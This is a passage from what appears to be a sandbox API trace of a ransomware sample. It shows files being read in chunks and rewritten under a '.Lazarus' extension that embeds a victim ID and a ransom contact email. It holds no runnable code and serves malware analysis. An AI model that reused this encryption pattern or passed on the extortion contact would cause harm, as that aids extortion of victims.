hHeap=0x20000) returned 1 [0104.107] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0104.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.107] AreFileApisANSI () returned 1 [0104.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0104.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 72 [0104.108] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4aebd53e, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x59a70)) returned 1 [0104.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0104.108] AreFileApisANSI () returned 1 [0104.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0104.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0104.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0104.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0104.108] GetLastError () returned 0x0 [0104.108] SetLastError (dwErrCode=0x0) [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x986d0 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0104.108] GetLastError () returned 0x0 [0104.108] SetLastError (dwErrCode=0x0) [0104.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x77) returned 0x6a9b0 [0104.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0104.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0104.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0104.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0104.109] AreFileApisANSI () returned 1 [0104.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 134 [0104.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10c) returned 0x8c058 [0104.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x8c058, cchWideChar=134 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 134 [0104.109] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0104.109] GetFileType (hFile=0x368) returned 0x1 [0104.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0104.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0104.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0104.110] AreFileApisANSI () returned 1 [0104.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0104.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0104.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 72 [0104.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0104.110] GetFileType (hFile=0x27c) returned 0x1 [0104.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0104.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0104.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0104.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0104.110] GetLastError () returned 0x0 [0104.110] SetLastError (dwErrCode=0x0) [0104.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0104.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0104.110] GetLastError () returned 0x0 [0104.110] SetLastError (dwErrCode=0x0) [0104.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0104.110] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0104.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x944a8 [0104.111] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0104.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0104.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0104.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x998e8 [0104.113] GetLastError () returned 0x0 [0104.113] SetLastError (dwErrCode=0x0) [0104.113] GetLastError () returned 0x0 [0104.113] SetLastError (dwErrCode=0x0) [0104.114] GetLastError () returned 0x0 [0104.114] SetLastError (dwErrCode=0x0) [0104.114] GetLastError () returned 0x0 [0104.114] SetLastError (dwErrCode=0x0) [0104.114] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.114] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.115] GetLastError () returned 0x0 [0104.116] SetLastError (dwErrCode=0x0) [0104.116] GetLastError () returned 0x0 [0104.116] SetLastError (dwErrCode=0x0) [0104.116] GetLastError () returned 0x0 [0104.116] SetLastError (dwErrCode=0x0) [0104.116] GetLastError () returned 0x0 [0104.116] SetLastError (dwErrCode=0x0) [0104.116] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.116] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.116] GetLastError () returned 0x0 [0104.116] SetLastError (dwErrCode=0x0) [0104.117] GetLastError () returned 0x0 [0104.117] SetLastError (dwErrCode=0x0) [0104.117] GetLastError () returned 0x0 [0104.117] SetLastError (dwErrCode=0x0) [0104.117] GetLastError () returned 0x0 [0104.117] SetLastError (dwErrCode=0x0) [0104.117] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.117] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.117] GetLastError () returned 0x0 [0104.117] SetLastError (dwErrCode=0x0) [0104.117] GetLastError () returned 0x0 [0104.118] SetLastError (dwErrCode=0x0) [0104.118] GetLastError () returned 0x0 [0104.118] SetLastError (dwErrCode=0x0) [0104.118] GetLastError () returned 0x0 [0104.118] SetLastError (dwErrCode=0x0) [0104.118] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.118] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.118] GetLastError () returned 0x0 [0104.118] SetLastError (dwErrCode=0x0) [0104.118] GetLastError () returned 0x0 [0104.118] SetLastError (dwErrCode=0x0) [0104.119] GetLastError () returned 0x0 [0104.119] SetLastError (dwErrCode=0x0) [0104.119] GetLastError () returned 0x0 [0104.119] SetLastError (dwErrCode=0x0) [0104.119] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.119] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.119] GetLastError () returned 0x0 [0104.119] SetLastError (dwErrCode=0x0) [0104.119] GetLastError () returned 0x0 [0104.119] SetLastError (dwErrCode=0x0) [0104.177] GetLastError () returned 0x0 [0104.181] SetLastError (dwErrCode=0x0) [0104.182] GetLastError () returned 0x0 [0104.182] SetLastError (dwErrCode=0x0) [0104.182] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.182] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.183] GetLastError () returned 0x0 [0104.183] SetLastError (dwErrCode=0x0) [0104.183] GetLastError () returned 0x0 [0104.183] SetLastError (dwErrCode=0x0) [0104.183] GetLastError () returned 0x0 [0104.183] SetLastError (dwErrCode=0x0) [0104.183] GetLastError () returned 0x0 [0104.183] SetLastError (dwErrCode=0x0) [0104.183] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.183] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.184] GetLastError () returned 0x0 [0104.184] SetLastError (dwErrCode=0x0) [0104.184] GetLastError () returned 0x0 [0104.184] SetLastError (dwErrCode=0x0) [0104.184] GetLastError () returned 0x0 [0104.184] SetLastError (dwErrCode=0x0) [0104.184] GetLastError () returned 0x0 [0104.184] SetLastError (dwErrCode=0x0) [0104.184] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.184] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.184] GetLastError () returned 0x0 [0104.184] SetLastError (dwErrCode=0x0) [0104.185] GetLastError () returned 0x0 [0104.185] SetLastError (dwErrCode=0x0) [0104.185] GetLastError () returned 0x0 [0104.185] SetLastError (dwErrCode=0x0) [0104.185] GetLastError () returned 0x0 [0104.185] SetLastError (dwErrCode=0x0) [0104.185] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.185] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.185] GetLastError () returned 0x0 [0104.185] SetLastError (dwErrCode=0x0) [0104.185] GetLastError () returned 0x0 [0104.185] SetLastError (dwErrCode=0x0) [0104.186] GetLastError () returned 0x0 [0104.186] SetLastError (dwErrCode=0x0) [0104.186] GetLastError () returned 0x0 [0104.186] SetLastError (dwErrCode=0x0) [0104.186] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.186] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.186] GetLastError () returned 0x0 [0104.186] SetLastError (dwErrCode=0x0) [0104.186] GetLastError () returned 0x0 [0104.186] SetLastError (dwErrCode=0x0) [0104.186] GetLastError () returned 0x0 [0104.186] SetLastError (dwErrCode=0x0) [0104.187] GetLastError () returned 0x0 [0104.187] SetLastError (dwErrCode=0x0) [0104.187] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.187] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.187] GetLastError () returned 0x0 [0104.187] SetLastError (dwErrCode=0x0) [0104.187] GetLastError () returned 0x0 [0104.187] SetLastError (dwErrCode=0x0) [0104.187] GetLastError () returned 0x0 [0104.187] SetLastError (dwErrCode=0x0) [0104.187] GetLastError () returned 0x0 [0104.187] SetLastError (dwErrCode=0x0) [0104.188] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.188] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.188] GetLastError () returned 0x0 [0104.188] SetLastError (dwErrCode=0x0) [0104.188] GetLastError () returned 0x0 [0104.188] SetLastError (dwErrCode=0x0) [0104.188] GetLastError () returned 0x0 [0104.188] SetLastError (dwErrCode=0x0) [0104.188] GetLastError () returned 0x0 [0104.188] SetLastError (dwErrCode=0x0) [0104.188] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.189] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.189] GetLastError () returned 0x0 [0104.189] SetLastError (dwErrCode=0x0) [0104.189] GetLastError () returned 0x0 [0104.189] SetLastError (dwErrCode=0x0) [0104.189] GetLastError () returned 0x0 [0104.189] SetLastError (dwErrCode=0x0) [0104.189] GetLastError () returned 0x0 [0104.189] SetLastError (dwErrCode=0x0) [0104.189] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.191] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.191] GetLastError () returned 0x0 [0104.191] SetLastError (dwErrCode=0x0) [0104.191] GetLastError () returned 0x0 [0104.191] SetLastError (dwErrCode=0x0) [0104.191] GetLastError () returned 0x0 [0104.191] SetLastError (dwErrCode=0x0) [0104.192] GetLastError () returned 0x0 [0104.192] SetLastError (dwErrCode=0x0) [0104.192] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.192] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.192] GetLastError () returned 0x0 [0104.192] SetLastError (dwErrCode=0x0) [0104.192] GetLastError () returned 0x0 [0104.192] SetLastError (dwErrCode=0x0) [0104.192] GetLastError () returned 0x0 [0104.192] SetLastError (dwErrCode=0x0) [0104.193] GetLastError () returned 0x0 [0104.193] SetLastError (dwErrCode=0x0) [0104.193] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.193] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.193] GetLastError () returned 0x0 [0104.193] SetLastError (dwErrCode=0x0) [0104.193] GetLastError () returned 0x0 [0104.193] SetLastError (dwErrCode=0x0) [0104.193] GetLastError () returned 0x0 [0104.193] SetLastError (dwErrCode=0x0) [0104.193] GetLastError () returned 0x0 [0104.193] SetLastError (dwErrCode=0x0) [0104.194] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.194] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.194] GetLastError () returned 0x0 [0104.194] SetLastError (dwErrCode=0x0) [0104.194] GetLastError () returned 0x0 [0104.194] SetLastError (dwErrCode=0x0) [0104.194] GetLastError () returned 0x0 [0104.194] SetLastError (dwErrCode=0x0) [0104.194] GetLastError () returned 0x0 [0104.194] SetLastError (dwErrCode=0x0) [0104.194] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.195] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.195] GetLastError () returned 0x0 [0104.195] SetLastError (dwErrCode=0x0) [0104.195] GetLastError () returned 0x0 [0104.195] SetLastError (dwErrCode=0x0) [0104.195] GetLastError () returned 0x0 [0104.195] SetLastError (dwErrCode=0x0) [0104.195] GetLastError () returned 0x0 [0104.195] SetLastError (dwErrCode=0x0) [0104.195] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.195] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.196] GetLastError () returned 0x0 [0104.196] SetLastError (dwErrCode=0x0) [0104.196] GetLastError () returned 0x0 [0104.196] SetLastError (dwErrCode=0x0) [0104.196] GetLastError () returned 0x0 [0104.196] SetLastError (dwErrCode=0x0) [0104.196] GetLastError () returned 0x0 [0104.196] SetLastError (dwErrCode=0x0) [0104.196] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.196] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.197] GetLastError () returned 0x0 [0104.197] SetLastError (dwErrCode=0x0) [0104.197] GetLastError () returned 0x0 [0104.197] SetLastError (dwErrCode=0x0) [0104.197] GetLastError () returned 0x0 [0104.197] SetLastError (dwErrCode=0x0) [0104.197] GetLastError () returned 0x0 [0104.197] SetLastError (dwErrCode=0x0) [0104.197] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.197] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.198] GetLastError () returned 0x0 [0104.198] SetLastError (dwErrCode=0x0) [0104.198] GetLastError () returned 0x0 [0104.198] SetLastError (dwErrCode=0x0) [0104.198] GetLastError () returned 0x0 [0104.198] SetLastError (dwErrCode=0x0) [0104.198] GetLastError () returned 0x0 [0104.198] SetLastError (dwErrCode=0x0) [0104.198] ReadFile (in: hFile=0x27c, lpBuffer=0x944a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x944a8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0104.198] WriteFile (in: hFile=0x368, lpBuffer=0x998e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0104.199] GetLastError () returned 0x0 [0104.199] 